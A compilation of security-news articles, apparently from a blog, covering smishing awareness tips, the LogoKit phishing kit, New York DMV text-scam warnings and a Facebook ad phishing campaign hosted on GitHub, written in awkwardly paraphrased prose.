Scammers are constantly striving to attack smartphone users, which is a part of a larger threat campaign series. The hackers here have the upper hand, first, they always come up with new techniques to attack users, secondly, in most of cases, victims are not even aware of these attacks. About social engineering, the initial stage is misdirection, where the user is excited and they become assured about whatever texts they receive.  For example, "you've got a text but there's a problem with your credit card."  A different variant of this theme delves into people's likes or interests to get their attention.  An attacker might use an emotional text to trigger user action.  This is why people often receive scam texts which have- Fire! Politics! Lottery! Crime! Hackers use these event references to trigger user action and make them click on a link, or open a website.  

How to protect yourself from scams.  
It is crucial for users to know how to stay safe from these scams and attacks. Application security, mobile data protection, and mobile phone security are the key components here.  Here's what a user can do: 

1. Avoid responding to suspicious messages, especially texts that ask you to click a link. Contact the source to confirm whether the information is authentic.  You may get a text from the delivery service, asking you to click the link to confirm, visit the website instead.  

2. Do not get tricked by messages or brands that seem to be genuine. Fake branding is one of the most common ways of fooling users.  

3. If possible, always report a scam text to be safe in the future. Most importantly, do not think that scamming is a threat of the past. 

In reality, these attacks are on the rise, evolving daily with new techniques. As an organization, staff must undergo training to identify and report scam texts and to be always prepared for the challenges.

LogoKit Can Manipulate Phishing Pages in Real Time

 

A recently uncovered phishing kit, named LogoKit, eliminates headaches for cybercriminals via automatically pulling victims' organization logos onto the phishing login page. This gives assailants the tools expected to effectively emulate organization login pages, a task that can now and again be intricate. Cybercriminals have depended on LogoKit to dispatch phishing assaults on in excess of 700 unique domains in the course of 30 days (including 300 in the past week). These focused on services range from generic login portals to bogus SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchange login portals. 

“With LogoKit’s intended functionality to be centered around singular emails per URL and extracting company logos, this dramatically improves ease of carrying out targeted attacks against organizations; and reusing pretexts without changing templates,” said Adam Castleman, security researcher with RiskIQ on Wednesday. 

Phishing kits, which can be bought by cybercriminals for anything in the range of $20 and $880, require minimal technical knowledge to work past modest programming skills. These kits are used to steal various information from victims – including usernames, passwords, credit card numbers, social security numbers, and more.

In some cases, for instance, attackers have been noticed facilitating their phishing pages on Google Firebase as a feature of the LogoKit assault. While LogoKit has been discovered utilizing these authentic facilitating services, researchers have likewise noticed compromised sites – many running WordPress — to have LogoKit variations. Cybercriminals send victims a specially created URL containing their email address. An illustration of a crafted URL that contains the email would be: "phishingpage[.]site/login.html#victim@company.com." 

On the off chance that the victim clicks on the URL, LogoKit at that point brings the organization logo from a third-party service, for example, marketing data engine Clearbit or Google's database for favicons (the graphic icons associated with particular webpages). 

Besides, since LogoKit is a collection of JavaScript files, its assets can likewise be facilitated on public trusted services like Firebase, GitHub, Oracle Cloud, and others, the greater part of which will be whitelisted inside corporate environments and trigger little alerts when loaded inside an employee's browser. RiskIQ said it is following this new threat intently because of the kit's simplicity, which the security firm accepts improves its odds of an effective phish.

DMV Warns New Yorkers of Text Phishing Schemes

 

The New York State Department of Motor Vehicles cautioned New Yorkers of progressing text message phishing schemes. These counterfeit text messages request that recipients update their driver's license contact data, with the messages connecting to a fake DMV site. Utilizing the progressing adoption of the REAL ID Act of 2005 trying to make the scam sound authentic, the attackers have utilized three explicit text phishing messages, said the New York State Department of Motor Vehicles (DMV). 

The New York DMV released three sorts of text phishing messages that fill in as the initial salvo in this attack.

 • The primary assault message illuminates the recipient in broken English that anybody holding a driver's license must "update their contact to compliance regulation agreements.” 

• The following text phishing message accomplishes something similar, advising the recipient they need to change their mailing and contact data to accelerate compliance with new ID guidelines. This rendition of the plan refers to REAL ID by name.

 • The last text message parrots the past two iterations however utilizes the most broken grammar of the three. 
Each three of the driver's license phishing messages diverts to a phony DMV site intended to steal data. 

New York State DMV cautioned of a similar text phishing assault in October 2020. In that case, threat actors were utilizing scam text messages to divert clients to a phony DMV site. On the off chance that somebody clicked on it, the attackers could target them with identity fraud or malware. In another situation, a text phishing scam utilized a pandemic alleviation payment as a cover story. The assault message informed the recipient, they were qualified for $600 on the off chance that they clicked on the embedded link. These attackers utilized caricaturing strategies to mask their message as true correspondence from New York's Department of Labor. 

These assaults feature the requirement for employers to protect themselves against phishing assaults professing to be government messages. They can do such by putting resources into making a security awareness training program. Seeing phishing assaults in a test setting can teach representatives about some of the most common types of scams being used today, as well as emerging campaigns. Employers can likewise consider utilizing phishing prevention technical controls.

6.15 Lakh Facebook Users' Account Compromised by Facebook Ad Phishing Campaign

 



A large scale ad phishing campaign that has compromised more than 6.15 lakh Facebook users' account was exposed by cybersecurity researchers. This ad phishing campaign is spread in at least 50 countries and reportedly the accounts are being compromised by exploiting the pages of open source repository GitHub. 
 
ThreatNix which is a Nepal-based security firm, while giving insights into the attack, said that the number of affected users is rapidly increasing, at an unusual pace of over 100 entries per minute and the situation is expected to worsen furthermore if necessary steps are not taken in due time.  
 
The researchers noted, "the phishing campaign by a sponsored Facebook post that was offering 3GB mobile data from Nepal Telecom and was redirecting to a phishing site hosted on GitHub page; the attackers created different pages imitating the legit pages from numerous entities. The attackers were using the profile picture and name of Nepal Telecom". 
 
Additionally, the cybersecurity firm claimed in a statement this week, “similar Facebook posts were used to target the Facebook users from Pakistan, Tunisia, Norway, Malaysia, Philippines, and Norway”. As per the findings of the firm, this ad phishing campaign is using localized Facebook posts and sending links inside these Facebook posts which redirected to a static GitHub page website that contained a login panel for Facebook. 
 
The cybersecurity researchers also noted that “after redirecting to a static GitHub page it forwarded the phished credentials to two endpoints one to a Firestore database and another to a domain which was owned by the phishing group”. The researchers also unearthed that nearly 500 GitHub repositories containing phishing pages are part of the identical phishing campaign. 
 
According to cybersecurity firm ThreatNix, they are working in unison with other authorities to “bring down the phishing infrastructure by reserving the information related to the domain”. The attackers were using Bitly link’s which pointed towards a benign page and when the Facebook ad was approved it was getting converted to point to the phishing domain, they used Bitly’s link because now Facebook takes all necessary steps to ensure that such phishing pages are not approved for ads.